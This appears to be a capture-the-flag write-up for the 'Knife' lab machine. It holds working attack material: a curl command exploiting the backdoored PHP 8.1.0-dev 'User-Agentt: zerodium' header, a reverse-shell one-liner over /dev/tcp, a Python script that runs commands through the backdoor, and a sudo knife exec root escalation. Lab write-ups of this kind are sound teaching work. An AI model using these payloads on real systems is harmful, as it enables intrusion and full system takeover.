Knife

About the machine

Knife is an easy machine. The web server runs a backdoored development build of PHP (8.1.0-dev), which gave me code execution and a foothold on the system; for privilege escalation, sudo allowed me to run the knife binary as root without a password.

Recon

nmap

Running a simple nmap scan reveals just two ports open, OpenSSH running on port 22 and Apache on port 80.

Based on SSH and Apache banners the host is likely to be running Ubuntu Focal Fossa (20.04).

HTTP

At first glance the page looked like some kind of Electronic Medical Records system.

After some time analyzing and fuzzing the page without finding anything interesting, I looked at the response headers to see if they contained anything useful.

What caught my attention was the PHP version advertised in the headers (8.1.0-dev). Googling it led me to the announcement of a backdoored version of PHP:

https://news-web.php.net/php.internals/113838

Here is the malicious code committed to the repository:

https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a

The backdoor is small. On every request it looks up the HTTP_USER_AGENTT server variable, i.e. the User-Agentt header (with a double t). If that value contains the string zerodium, everything after the first eight characters (the length of "zerodium") is passed to the engine's eval and executed as PHP code. So a header value of zerodiumsystem('id'); is evaluated as system('id'); .

User

RCE

Using curl alone we can check whether the host is vulnerable. The injected code runs before the page is rendered, so the command output appears at the very top of the response:

curl -s http://10.10.10.242/ -H "User-Agentt: zerodiumsystem('id');" | head -n 1

With the vulnerability confirmed, the next step is a reverse shell (replace IP and PORT with the listener's address):

curl -s http://10.10.10.242/ -H "User-Agentt: zerodiumsystem('/bin/bash -c \'bash -i >& /dev/tcp/IP/PORT 0>&1\'');"
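The two curl commands above are all that is needed, but when reusing the backdoor for many commands it is convenient to wrap the output in markers so it can be pulled out of the HTML reliably instead of relying on head -n 1. The script below is an added example written for this writeup, not code from the original page or from the PHP project: it builds the User-Agentt value (escaping the command for the PHP single-quoted string it is placed in), sends it with the standard library, and extracts the command output between two marker strings. The marker text, the helper names and the sample response body are all assumptions made here for illustration.

```python
import urllib.error
import urllib.request
from typing import Optional

# Hypothetical delimiter chosen for this example; any string unlikely to
# appear in the page body works.
MARKER = "__KNIFE_OUT__"

# Constructed sample response, as the backdoored server would return it:
# the eval'd code runs before the script, so our output precedes the HTML.
SAMPLE_BODY = (
    "__KNIFE_OUT__uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"
    "__KNIFE_OUT__<!DOCTYPE html><html><body>EMR</body></html>"
)


def build_payload(cmd: str, marker: str = MARKER) -> str:
    """Return the User-Agentt value the backdoor evaluates.

    The value must start with "zerodium"; the eval receives everything after
    those eight characters as PHP code.
    """
    if "\r" in cmd or "\n" in cmd:
        raise ValueError("command must be a single line: header values cannot contain CR/LF")
    # cmd is embedded in a PHP single-quoted string, where only \ and ' are special.
    escaped = cmd.replace("\\", "\\\\").replace("'", "\\'")
    return f"zerodiumecho '{marker}'; system('{escaped}'); echo '{marker}';"


def extract_output(body: str, marker: str = MARKER) -> Optional[str]:
    """Return the text between the first two markers, or None if absent."""
    start = body.find(marker)
    if start == -1:
        return None
    start += len(marker)
    end = body.find(marker, start)
    if end == -1:
        return None
    return body[start:end].strip()


def run_command(url: str, cmd: str, timeout: float = 10.0) -> Optional[str]:
    """Send one command through the backdoor and return its output.

    Returns None when the request fails or the markers are not present,
    which is the 'not vulnerable' case for a quick check.
    """
    req = urllib.request.Request(url, headers={"User-Agentt": build_payload(cmd)})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except urllib.error.URLError:
        return None
    return extract_output(body)


if __name__ == "__main__":
    # Offline demonstration on the constructed body; against a live target use
    # run_command("http://10.10.10.242/", "id") instead.
    print(build_payload("id"))
    print(extract_output(SAMPLE_BODY))
```

If extract_output returns None for a target that is otherwise responding, the host is either not running the backdoored build or the header is being stripped by a proxy in front of it.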

Root

Enumeration

After getting a shell, running sudo -l shows that I can run /usr/bin/knife as root with no password.

Searching for what it is, I found it is part of Chef, a DevOps automation platform.

knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server.

knife can do many things, including evaluating arbitrary Ruby with knife exec (the -E option takes a string of Ruby code). Because sudo grants the whole binary, anything that Ruby does, such as spawning a shell, runs as root.

Running the following command gave me a root shell:

sudo /usr/bin/knife exec -E 'exec "/bin/bash"'
